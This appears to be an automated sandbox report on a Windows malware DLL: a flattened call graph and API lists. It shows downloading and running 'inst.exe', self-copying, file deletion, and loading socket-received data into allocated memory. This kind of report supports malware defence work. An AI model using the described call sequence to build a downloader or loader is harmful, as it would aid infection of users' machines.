11517->11505 11517->11510 11519 1000c0f8 ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 11518->11519 11520 1000c0da ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11518->11520 11519->11505 11520->11519 10702 10011c50 10703 10011c6c 10702->10703 10704 10011c5c ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 10702->10704 10704->10703 11137 2861b57 11140 2861b87 11137->11140 11156 2871737 11140->11156 11143 2861bd5 HttpQueryInfoW 11144 2861c11 SendMessageW 11143->11144 11145 2861c28 InternetReadFile 11143->11145 11144->11145 11146 2861cfe InternetCloseHandle InternetCloseHandle GetParent ShowWindow 11145->11146 11149 2861c4a 11145->11149 11158 2861727 11146->11158 11149->11145 11149->11146 11152 2861ce8 SendMessageW 11149->11152 11150 2861d42 11151 2861727 6 API calls 11150->11151 11153 2861d52 11151->11153 11152->11149 11164 286f307 11153->11164 11157 2861b94 InternetOpenA InternetOpenUrlA 11156->11157 11157->11143 11159 2861749 11158->11159 11163 2861780 _Error_objects 11158->11163 11183 2870748 RtlAcquireSRWLockExclusive 11159->11183 11161 2861753 _Error_objects 11161->11163 11188 28706f7 RtlAcquireSRWLockExclusive RtlReleaseSRWLockExclusive RtlWakeAllConditionVariable 11161->11188 11163->11150 11165 286f329 11164->11165 11190 286ee57 RpcStringBindingComposeW 11165->11190 11171 286f388 _swprintf 11205 286ff17 NdrClientCall2 11171->11205 11173 2861b7a 11174 286f405 Sleep 11175 286f057 5 API calls 11174->11175 11176 286f3e1 11175->11176 11176->11173 11176->11174 11177 286f42e 11176->11177 11206 286f1e7 11177->11206 11179 286f456 Sleep 11180 286f43b 11179->11180 11180->11173 11180->11179 11181 286f49b 11180->11181 11182 286f217 NdrClientCall2 11181->11182 11182->11173 11184 287075c 11183->11184 11185 2870761 RtlReleaseSRWLockExclusive 11184->11185 11189 2870797 SleepConditionVariableSRW 11184->11189 11185->11161 11188->11163 11189->11184 11191 286eea4 11190->11191 11192 286eea8 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 11190->11192 11193 286f057 11191->11193 11192->11191 11196 286f080 11193->11196 11194 286f0ba 11194->11171 11202 286f217 11194->11202 11196->11194 11197 286f1a5 CoTaskMemFree 11196->11197 11198 286f1b8 CoTaskMemFree 11196->11198 11199 286f148 11196->11199 11209 286ff47 NdrClientCall2 11196->11209 11197->11196 11198->11194 11198->11196 11200 286f175 CoTaskMemFree 11199->11200 11201 286f162 CoTaskMemFree 11199->11201 11200->11194 11201->11199 11210 286ffc7 NdrClientCall2 11202->11210 11204 286f229 11204->11171 11205->11176 11211 286ff87 NdrClientCall2 11206->11211 11208 286f208 11208->11180 11209->11196 11210->11204 11211->11208 11521 10010b5d 11522 10010b68 11521->11522 11523 10010b9b 11521->11523 11526 10010b6d 11522->11526 11527 10010bb0 11522->11527 11524 10010cb7 __DllMainCRTStartup@12 15 API calls 11523->11524 11524->11526 11528 10010bbc ___scrt_is_nonwritable_in_current_image 11527->11528 11545 10010942 11528->11545 11530 10010bc3 __DllMainCRTStartup@12 11531 10010bea 11530->11531 11532 10010caf 11530->11532 11539 10010c4a ___scrt_is_nonwritable_in_current_image 11530->11539 11549 100108a4 11531->11549 11533 1001124d __DllMainCRTStartup@12 6 API calls 11532->11533 11535 10010cb6 11533->11535 11536 10010bf9 __RTC_Initialize 11536->11539 11552 100114a3 InitializeSListHead 11536->11552 11538 10010c07 11540 10010c0c _initterm_e 11538->11540 11539->11526 11540->11539 11541 10010c21 11540->11541 11553 10010879 11541->11553 11543 10010c26 11543->11539 11544 10010c2a _initterm 11543->11544 11544->11539 11546 1001094b 11545->11546 11562 10010f10 IsProcessorFeaturePresent 11546->11562 11548 10010957 ___scrt_uninitialize_crt 11548->11530 11564 1001097b 11549->11564 11551 100108ab 11551->11536 11552->11538 11554 1001087e ___scrt_release_startup_lock 11553->11554 11555 10010882 11554->11555 11556 10010889 11554->11556 11557 10010f10 IsProcessorFeaturePresent 11555->11557 11559 1001088e _configure_narrow_argv 11556->11559 11558 10010887 11557->11558 11558->11543 11560 10010899 11559->11560 11561 1001089c _initialize_narrow_environment 11559->11561 11560->11543 11561->11558 11563 10010f34 11562->11563 11563->11548 11565 10010987 11564->11565 11566 1001098b 11564->11566 11565->11551 11567 100109fa 11566->11567 11570 10010998 ___scrt_release_startup_lock 11566->11570 11568 1001124d __DllMainCRTStartup@12 6 API calls 11567->11568 11569 10010a01 11568->11569 11571 100109a5 _initialize_onexit_table 11570->11571 11572 100109c3 11570->11572 11571->11572 11573 100109b4 _initialize_onexit_table 11571->11573 11572->11551 11573->11572 10779 100108de 10781 100108e6 ___scrt_release_startup_lock 10779->10781 10780 10010903 _seh_filter_dll 10781->10780 9166 10001a60 9167 10001a81 GetModuleHandleA CreateWindowExW SetWindowTheme SendMessageW malloc 9166->9167 9168 10001a72 9166->9168 9176 10001f50 9167->9176 9169 10001b52 PostQuitMessage 9168->9169 9170 10001a7c DefWindowProcW 9168->9170 9173 10001b75 9169->9173 9170->9173 9175 10001b32 CreateThread 9175->9173 9178 10001b80 9175->9178 9177 10001f5f Concurrency::task_continuation_context::task_continuation_context 9176->9177 9177->9175 9181 10001bb0 9178->9181 9180 10001ba3 9196 10011760 9181->9196 9184 10001c51 InternetReadFile 9186 10001d27 fclose InternetCloseHandle InternetCloseHandle GetParent ShowWindow 9184->9186 9189 10001c73 9184->9189 9185 10001c3a SendMessageW 9185->9184 9198 10001750 9186->9198 9187 10001c7d fwrite 9187->9189 9189->9184 9189->9186 9189->9187 9192 10001d11 SendMessageW 9189->9192 9190 10001d6b 9191 10001750 17 API calls 9190->9191 9193 10001d7b 9191->9193 9192->9189 9212 1000f330 9193->9212 9197 10001bbd InternetOpenA InternetOpenUrlA fopen HttpQueryInfoW 9196->9197 9197->9184 9197->9185 9199 10001772 9198->9199 9201 100017a9 _Error_objects 9198->9201 9251 10010771 AcquireSRWLockExclusive 9199->9251 9240 10002e30 9201->9240 9202 1000177c _Error_objects 9202->9201 9256 10010b09 9202->9256 9207 100017f9 9244 10001de0 9207->9244 9209 1000180a 9248 10001dc0 9209->9248 9211 10001812 9211->9190 9213 1000f352 9212->9213 9330 1000f590 9213->9330 9220 1000f3b1 9345 1000ef30 9220->9345 9221 1000f240 NdrClientCall2 9221->9220 9227 1000f40a 9228 1000f42e Sleep 9227->9228 9229 10001d8e exit 9227->9229 9231 1000f457 9227->9231 9230 1000f080 5 API calls 9228->9230 9229->9180 9230->9227 9364 1000f210 9231->9364 9233 1000f47f Sleep 9367 1000f5b0 9233->9367 9236 10001dc0 2 API calls 9237 1000f464 9236->9237 9237->9229 9237->9233 9237->9236 9238 1000f4c4 9237->9238 9371 1000f260 CreateToolhelp32Snapshot 9237->9371 9382 1000f240 9238->9382 9241 10002e65 HandleT 9240->9241 9243 10002ea2 _Error_objects 9241->9243 9260 100038b0 9241->9260 9243->9207 9245 10001df2 HandleT Concurrency::task_continuation_context::task_continuation_context 9244->9245 9246 100023a0 2 API calls 9245->9246 9247 10001dfa 9245->9247 9246->9247 9247->9209 9249 100023a0 2 API calls 9248->9249 9250 10001dcf 9249->9250 9250->9211 9255 10010785 9251->9255 9252 1001078a ReleaseSRWLockExclusive 9252->9202 9255->9252 9325 100107c0 SleepConditionVariableSRW 9255->9325 9326 10010adb 9256->9326 9259 10010720 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 9259->9201 9261 100038dc Concurrency::task_continuation_context::task_continuation_context 9260->9261 9263 1000391c 9261->9263 9268 100015e0 ?_Xlength_error@std@@YAXPBD 9261->9268 9265 1000393f Concurrency::task_continuation_context::task_continuation_context 9263->9265 9269 100039e0 9263->9269 9272 10003b00 9265->9272 9268->9263 9276 10003b90 9269->9276 9273 100039c1 9272->9273 9274 10003b0f 9272->9274 9273->9243 9309 100023a0 9274->9309 9279 10003bd0 9276->9279 9284 10003c70 9279->9284 9285 10003be0 9284->9285 9286 10003c8a 9284->9286 9288 10003c30 9285->9288 9295 10001490 9286->9295 9289 10003c3d 9288->9289 9290 10003a05 9288->9290 9291 10003c54 9289->9291 9292 10003c46 9289->9292 9290->9265 9306 10001520 9291->9306 9298 10003cb0 9292->9298 9296 10001410 stdext::threads::lock_error::lock_error 9295->9296 9297 1000149e _CxxThrowException 9296->9297 9297->9285 9299 10003cc7 9298->9299 9302 10003ccc 9298->9302 9300 10001490 allocator _CxxThrowException 9299->9300 9300->9302 9301 10001520 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9303 10003cd6 9301->9303 9302->9301 9304 10003ce4 _invalid_parameter_noinfo_noreturn 9303->9304 9305 10003cf3 9303->9305 9304->9303 9304->9304 9305->9290 9307 100107d5 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9306->9307 9308 1000152c 9307->9308 9308->9290 9310 100023b7 Concurrency::task_continuation_context::task_continuation_context 9309->9310 9312 100023e8 _Error_objects 9310->9312 9313 10002b30 9310->9313 9312->9273 9316 10002dc0 9313->9316 9319 10003550 9316->9319 9320 1000357e 9319->9320 9321 10003571 9319->9321 9323 10010b1e _MallocaArrayHolder free 9320->9323 9322 10001540 allocator _invalid_parameter_noinfo_noreturn 9321->9322 9322->9320 9324 10002b5b 9323->9324 9324->9312 9325->9255 9327 10010af1 _register_onexit_function 9326->9327 9328 10010aea _crt_atexit 9326->9328 9329 1000179c 9327->9329 9328->9329 9329->9259 9385 1000f8a0 9330->9385 9333 1000ee80 RpcStringBindingComposeW 9334 1000eed1 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 9333->9334 9335 1000eecd 9333->9335 9334->9335 9336 1000f080 9335->9336 9339 1000f0a9 9336->9339 9337 1000f0e3 9337->9220 9337->9221 9339->9337 9340 1000f1e1 CoTaskMemFree 9339->9340 9341 1000f1ce CoTaskMemFree 9339->9341 9342 1000f171 9339->9342 9411 1000ff70 NdrClientCall2 9339->9411 9340->9337 9340->9339 9341->9339 9343 1000f18b CoTaskMemFree 9342->9343 9344 1000f19e CoTaskMemFree 9342->9344 9343->9342 9344->9337 9346 1000f5b0 8 API calls 9345->9346 9347 1000ef57 9346->9347 9348 1000f5b0 8 API calls 9347->9348 9349 1000ef6a 9348->9349 9350 1000f5b0 8 API calls 9349->9350 9351 1000ef7a 9350->9351 9353 1000efc7 9351->9353 9412 1000f550 9351->9412 9354 10001dc0 2 API calls 9353->9354 9355 1000f049 9354->9355 9356 10001dc0 2 API calls 9355->9356 9357 1000f055 9356->9357 9358 10001dc0 2 API calls 9357->9358 9359 1000f064 9358->9359 9360 1000ed40 9359->9360 9471 1000ecf0 9360->9471 9363 1000ff40 NdrClientCall2 9363->9227 9476 1000ffb0 NdrClientCall2 9364->9476 9366 1000f231 9366->9237 9368 1000f5e1 HandleT _Error_objects 9367->9368 9477 1000fad0 9368->9477 9370 1000f60a 9370->9237 9372 1000f283 Process32FirstW 9371->9372 9373 1000f27c 9371->9373 9374 1000f2a2 9372->9374 9376 1000f2d5 9372->9376 9373->9237 9491 1000cde0 9374->9491 9378 1000f2dd _wcsicmp 9376->9378 9379 1000f300 Process32NextW 9378->9379 9380 1000f2f2 CloseHandle 9378->9380 9379->9376 9381 1000f315 CloseHandle 9379->9381 9380->9373 9381->9373 9533 1000fff0 NdrClientCall2 9382->9533 9384 1000f252 9384->9229 9386 1000f8b0 HandleT 9385->9386 9389 1000f950 9386->9389 9388 1000f360 9388->9333 9390 1000f9ad 9389->9390 9393 1000f964 9389->9393 9396 1000fd40 9390->9396 9392 1000f989 _Error_objects 9392->9388 9395 1000fa10 memmove 9393->9395 9395->9392 9397 1000fd51 9396->9397 9399 1000fd5b Concurrency::task_continuation_context::task_continuation_context 9397->9399 9406 100015e0 ?_Xlength_error@std@@YAXPBD 9397->9406 9400 100039e0 6 API calls 9399->9400 9401 1000fd8c HandleT Concurrency::task_continuation_context::task_continuation_context 9400->9401 9407 1000f9d0 9401->9407 9403 1000fdc9 9404 10002b30 2 API calls 9403->9404 9405 1000fde3 Concurrency::task_continuation_context::task_continuation_context 9403->9405 9404->9405 9405->9392 9406->9399 9410 10002ae0 memmove 9407->9410 9409 1000f9ea _Error_objects 9409->9403 9410->9409 9411->9339 9413 1000f56a 9412->9413 9416 1000f630 9413->9416 9436 10002cf0 9416->9436 9418 1000f64b 9419 1000f693 9418->9419 9420 1000f66c 9418->9420 9421 1000f6b3 9419->9421 9422 1000f71d 9419->9422 9440 1000fa10 memmove 9420->9440 9441 1000fa10 memmove 9421->9441 9423 1000f803 9422->9423 9428 1000f738 9422->9428 9446 1000fc10 9423->9446 9426 1000f585 9426->9351 9443 1000fa10 memmove 9428->9443 9429 1000f6db 9442 1000fa10 memmove 9429->9442 9432 1000f7be 9444 1000fa10 memmove 9432->9444 9434 1000f7d2 9445 10002ae0 memmove 9434->9445 9437 10002d02 9436->9437 9439 10002d07 9436->9439 9459 10002de0 ?_Xout_of_range@std@@YAXPBD 9437->9459 9439->9418 9440->9426 9441->9429 9442->9426 9443->9432 9444->9434 9445->9426 9447 1000fc30 9446->9447 9449 1000fc3d Concurrency::task_continuation_context::task_continuation_context 9447->9449 9460 100015e0 ?_Xlength_error@std@@YAXPBD 9447->9460 9450 100039e0 6 API calls 9449->9450 9451 1000fc77 HandleT Concurrency::task_continuation_context::task_continuation_context 9450->9451 9452 1000fcac HandleT 9451->9452 9453 1000fcff 9451->9453 9461 1000f830 9452->9461 9454 1000f830 memmove 9453->9454 9458 1000fcf2 Concurrency::task_continuation_context::task_continuation_context 9454->9458 9457 10002b30 2 API calls 9457->9458 9458->9426 9459->9439 9460->9449 9468 10002ae0 memmove 9461->9468 9463 1000f848 9469 10002ae0 memmove 9463->9469 9465 1000f862 9470 10002ae0 memmove 9465->9470 9467 1000f897 9467->9457 9468->9463 9469->9465 9470->9467 9475 1000ece0 9471->9475 9473 1000ed0f __stdio_common_vswprintf 9474 1000ed28 9473->9474 9474->9363 9475->9473 9476->9366 9478 1000fae7 9477->9478 9480 1000faf1 Concurrency::task_continuation_context::task_continuation_context 9478->9480 9488 100015e0 ?_Xlength_error@std@@YAXPBD 9478->9488 9481 1000fb1b 9480->9481 9483 1000fb6c 9480->9483 9489 10002ae0 memmove 9481->9489 9484 100039e0 6 API calls 9483->9484 9486 1000fb93 HandleT Concurrency::task_continuation_context::task_continuation_context 9484->9486 9485 1000fb3f HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 9485->9370 9490 10002ae0 memmove 9486->9490 9488->9480 9489->9485 9490->9485 9514 10002a80 9491->9514 9493 1000ce12 ?width@ios_base@std@ 9494 1000ce8a 9493->9494 9495 1000ce3a 9493->9495 9516 1000bec0 9494->9516 9495->9494 9496 1000ce42 ?width@ios_base@std@ 9495->9496 9496->9494 9497 1000ce61 9496->9497 9497->9494 9499 1000ce6b ?width@ios_base@std@ 9497->9499 9499->9494 9500 1000cead 9501 1000ced4 ?flags@ios_base@std@ 9500->9501 9502 1000cec6 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 9500->9502 9509 1000cef9 Concurrency::task_continuation_context::task_continuation_context 9501->9509 9512 1000cf79 9501->9512 9523 1000be70 ?uncaught_exception@std@ 9502->9523 9504 1000cfc8 Concurrency::task_continuation_context::task_continuation_context 9508 1000d073 ?width@ios_base@std@@QAE_J_J 9504->9508 9511 1000d005 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@ ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 9504->9511 9513 1000d063 9504->9513 9505 1000cf8f ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J 9505->9504 9508->9502 9510 1000cf1b ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@ ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 9509->9510 9509->9512 9510->9509 9511->9504 9512->9504 9512->9505 9513->9508 9515 10002a95 9514->9515 9515->9493 9515->9515 9529 1000cac0 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 9516->9529 9519 1000bf12 ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2 9520 1000bf09 9519->9520 9521 1000bf2c HandleT 9519->9521 9520->9500 9521->9520 9522 1000bf46 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 ?good@ios_base@std@ 9521->9522 9522->9520 9524 1000be86 9523->9524 9525 1000beaa 9524->9525 9526 1000be9e ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 9524->9526 9531 1000ca50 ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2 9525->9531 9526->9525 9530 1000beea ?good@ios_base@std@ 9529->9530 9530->9519 9530->9520 9532 1000beb2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z CloseHandle 9531->9532 9532->9373 9533->9384 11212 1000bde0 11213 10004510 11 API calls 11212->11213 11214 1000bdf2 11213->11214 11215 1000be0b 11214->11215 11216 10010b1e _MallocaArrayHolder free 11214->11216 11216->11215 11317 1000ee60 free 11574 10001360 11579 10001300 __std_exception_destroy 11574->11579 11576 1000136f 11577 10010b1e _MallocaArrayHolder free 11576->11577 11578 10001382 11576->11578 11577->11578 11579->11576 11580 28705e7 11585 2870427 11580->11585 11582 28705ef GetCurrentThread WaitForSingleObject CreateThread CreateThread 11598 2861147 LoadLibraryW GetProcAddress GetProcAddress 11582->11598 11628 100048c0 60 API calls 2 library calls 11582->11628 11629 100100c0 20 API calls 11582->11629 11586 2870450 11585->11586 11604 2870357 GetModuleFileNameA 11586->11604 11588 2870463 11606 2870307 GetModuleFileNameA 11588->11606 11590 28704aa 11591 2870307 GetModuleFileNameA 11590->11591 11597 287053b 11590->11597 11592 2870565 11591->11592 11593 287057c CopyFileA 11592->11593 11608 2862077 11593->11608 11595 287058e ShellExecuteA 11610 2861807 GetModuleHandleA 11595->11610 11597->11582 11599 2861199 GetModuleHandleA RegisterClassW CreateWindowExW 11598->11599 11601 286121e GetMessageW 11599->11601 11602 286121c 11599->11602 11601->11602 11603 2861232 TranslateMessage DispatchMessageW 11601->11603 11603->11601 11605 287039f 11604->11605 11605->11588 11607 287033a 11606->11607 11607->11590 11609 2862086 11608->11609 11609->11595 11611 286184a 11610->11611 11620 28615d7 11611->11620 11613 28618a2 11614 286192f RegisterClassW 11613->11614 11615 2861727 6 API calls 11614->11615 11616 28619b2 CreateWindowExW ShowWindow 11615->11616 11617 28619eb GetMessageW 11616->11617 11618 2861a16 11617->11618 11619 28619ff TranslateMessage DispatchMessageW 11617->11619 11618->11597 11619->11617 11626 2862287 11620->11626 11622 2861612 SHGetKnownFolderPath 11623 286168e 11622->11623 11624 2861641 11622->11624 11623->11613 11625 2861680 CoTaskMemFree 11624->11625 11625->11623 11627 28622b8 _Error_objects 11626->11627 11627->11622 10782 10011ce0 ??1_Lockit@std@@QAE 11660 2869962 11661 2869965 _Smanip _Error_objects 11660->11661 11662 2864657 DeleteFileA 11661->11662 11663 2869c25 11662->11663 11664 2864417 SetFileAttributesA 11663->11664 11665 2869c56 11664->11665 11666 2869c68 Sleep 11665->11666 11667 2869c80 _Smanip _Error_objects 11666->11667 11668 2864657 DeleteFileA 11667->11668 11669 286a1ce 11668->11669 11670 2864417 SetFileAttributesA 11669->11670 11671 286a1ff 11670->11671 11672 286a211 Sleep 11671->11672 11673 286a229 _Smanip _Error_objects 11672->11673 11674 286a5d8 WinExec 11673->11674 11675 286a5eb _Smanip _Error_objects 11674->11675 11676 286a8ca WinExec Sleep 11675->11676 11677 286a8e8 11676->11677 11678 2864877 SetFileAttributesA 11677->11678 11679 286a904 11678->11679 11680 2864877 SetFileAttributesA 11679->11680 11681 286a93e 11680->11681 11682 2864657 DeleteFileA 11681->11682 11683 286a962 11682->11683 11684 2864657 DeleteFileA 11683->11684 11685 286a976 11684->11685 10783 1000d4e5 10784 1000d4ec 10783->10784 10785 1000dbb0 2 API calls 10784->10785 10786 1000d502 10785->10786 10711 10011c6d ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 11471 1000aaf0 11472 1000d330 8 API calls 11471->11472 11473 1000ab00 11472->11473 11474 1000c160 2 API calls 11473->11474 11475 1000ab0c 11474->11475 10853 2863ff7 MultiByteToWideChar 10854 2864032 10853->10854 10855 2864050 MultiByteToWideChar WideCharToMultiByte 10854->10855 10856 2864095 10855->10856 10857 28640b3 WideCharToMultiByte 10856->10857 10858 28640d9 10857->10858 11217 100101f0 11218 1001015a 11217->11218 11219 1001031d 11217->11219 11220 100101f5 freeaddrinfo 11218->11220 11221 1001016d socket 11218->11221 11222 10010209 WSACleanup exit 11220->11222 11229 10010222 11220->11229 11223 10010196 WSACleanup exit 11221->11223 11224 100101af connect 11221->11224 11222->11219 11223->11219 11225 100101d3 closesocket 11224->11225 11226 100101ee 11224->11226 11225->11218 11226->11220 11227 10010229 recv 11228 100102a1 11227->11228 11227->11229 11231 100102a7 11228->11231 11232 100102ab closesocket WSACleanup free exit 11228->11232 11229->11227 11230 10010276 realloc 11229->11230 11233 100102e8 VirtualAlloc memmove 11229->11233 11230->11229 11231->11233 11232->11219 11233->11219 10787 2870e72 10788 2870e80 10787->10788 10789 2870e7b 10787->10789 10797 2870d3c 10788->10797 10793 287140d 10789->10793 10794 2871423 10793->10794 10796 287142c 10794->10796 10813 28713c0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10794->10813 10796->10788 10799 2870d48 ___scrt_is_nonwritable_in_current_image 10797->10799 10798 2870d57 10799->10798 10800 2870d71 dllmain_raw 10799->10800 10802 2870d6c 10799->10802 10800->10798 10801 2870d8b 10800->10801 10814 2870b34 10801->10814 10802->10798 10818 2871458 10802->10818 10806 2870ddd 10806->10798 10807 2870b34 __DllMainCRTStartup@12 2 API calls 10806->10807 10810 2870df0 10807->10810 10808 2871458 _DllMain@12 DisableThreadLibraryCalls 10809 2870dc4 10808->10809 10812 2870dd2 dllmain_raw 10809->10812 10810->10798 10811 2870df9 dllmain_raw 10810->10811 10811->10798 10812->10806 10813->10796 10815 2870b3f 10814->10815 10817 2870b44 __DllMainCRTStartup@12 10814->10817 10815->10817 10822 2870b87 10815->10822 10817->10802 10819 2870dac 10818->10819 10820 2871461 10818->10820 10819->10806 10819->10808 10820->10819 10821 287146a DisableThreadLibraryCalls 10820->10821 10821->10819 10823 2870b93 ___scrt_is_nonwritable_in_current_image 10822->10823 10830 2870919 10823->10830 10825 2870b9a __RTC_Initialize __DllMainCRTStartup@12 10827 2870bfd ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10825->10827 10834 287147a RtlInitializeSListHead 10825->10834 10827->10817 10828 2870bde __DllMainCRTStartup@12 10828->10827 10835 2870850 10828->10835 10831 2870922 10830->10831 10839 2870ee7 IsProcessorFeaturePresent 10831->10839 10833 287092e ___scrt_uninitialize_crt 10833->10825 10834->10828 10836 2870855 ___scrt_release_startup_lock 10835->10836 10837 2870ee7 __DllMainCRTStartup@12 IsProcessorFeaturePresent 10836->10837 10838 287085e __DllMainCRTStartup@12 10836->10838 10837->10838 10838->10827 10840 2870f0b 10839->10840 10840->10833 11330 1000b276 11331 100020a0 2 API calls 11330->11331 11332 1000b285 11331->11332 10859 10004178 10860 10004181 10859->10860 10861 1000b950 10 API calls 10860->10861 10863 1000421b _Error_objects 10860->10863 10862 10004209 10861->10862 10862->10863 10864 10004237 10862->10864 10865 1000426c 10862->10865 10866 1000cd10 10 API calls 10863->10866 10867 1000b950 10 API calls 10864->10867 10868 1000b950 10 API calls 10865->10868 10869 1000431d 10866->10869 10867->10863 10870 1000429c 10868->10870 10872 10004020 5 API calls 10869->10872 10871 1000b950 10 API calls 10870->10871 10871->10863 10873 1000432f 10872->10873 10874 10002190 8 API calls 10873->10874 10875 10004341 10874->10875 10876 100020a0 2 API calls 10875->10876 10877 1000436b 10876->10877 10878 1000b970 2 API calls 10877->10878 10879 1000437a 10878->10879 10841 286f278 10842 286f29e CloseHandle 10841->10842 10843 286f2f8 10842->10843

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 02860032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 028604AE
                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 028604DE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                                      • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                      • API String ID: 2032221330-2899676511
                                                                                                                                                                      • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                      • Instruction ID: 20b1533ca945967a01a7202aa5fb22a40f2745df98c920629b603b0611bc0325
                                                                                                                                                                      • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                      • Instruction Fuzzy Hash: D1628A395083858FD720CF24C844BABBBE5FF94704F04492DE9C9DB292E7719948CB9A
                                                                                                                                                                      Function 10001BB0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 143networkfilewindowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 10001BCA
                                                                                                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 10001BE6
                                                                                                                                                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,10012458,?,10001BA3,?,?,?), ref: 10001BF8
                                                                                                                                                                      • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10001C2D
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10001C4A
                                                                                                                                                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 10001C65
                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10001C8E
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 10001D1B
                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10001D2B
                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 10001D38
                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 10001D42
                                                                                                                                                                      • GetParent.USER32(?), ref: 10001D4C
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 10001D5B
                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10001D93
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindowexitfclosefopenfwrite
                                                                                                                                                                      • String ID: URLDownloader$inst.exe
                                                                                                                                                                      • API String ID: 3413257080-3182466430
                                                                                                                                                                      • Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                      • Instruction ID: ddbd601f5f187a188268b5c7d9f2a971705c802d5f1a5a55912b1b5dcc305942
                                                                                                                                                                      • Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
